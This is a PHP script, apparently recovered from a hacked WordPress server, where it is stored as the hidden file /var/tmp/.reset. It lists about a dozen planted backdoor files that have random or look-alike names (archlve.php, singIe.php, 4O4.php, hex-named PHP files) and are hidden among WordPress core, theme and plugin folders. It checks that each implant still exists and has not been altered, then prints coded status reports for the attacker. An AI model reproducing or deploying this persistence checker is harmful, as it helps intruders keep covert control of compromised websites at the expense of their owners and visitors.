File: //var/tmp/.reset
<?php $r = '/home/ian_mchenry/ianmchenry.co'; $x = ["/wp-includes/class-wp-post-type.php"=>"bd@@411484@@Feature-Policy",
"/wp-includes/assets/home.1748025714.php"=>"bd@@260421@@727",
"/c28997.php"=>"bd@@87913@@105",
"/3acfa5.php"=>"bd@@18038@@105",
"/d48bb0.php"=>"bd@@19325@@105",
"/wp-content/themes/author-template-1748020260/archlve.php"=>"bd@@256929@@727",
"/wp-content/themes/custom-file-1-1747911570/singIe.php"=>"bd@@223914@@731",
"/64ca11.php"=>"bd@@69817@@105",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-backup/src/js/components/review-request/jpgraph_plotband.php"=>"bd@@244442@@207",
"/wp-content/themes/archives_1748013676/4O4.php"=>"bd@@252634@@727",
"/wp-content/themes/twentytwentytwo/assets/images/TagTransform.php"=>"bd@@244451@@476"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');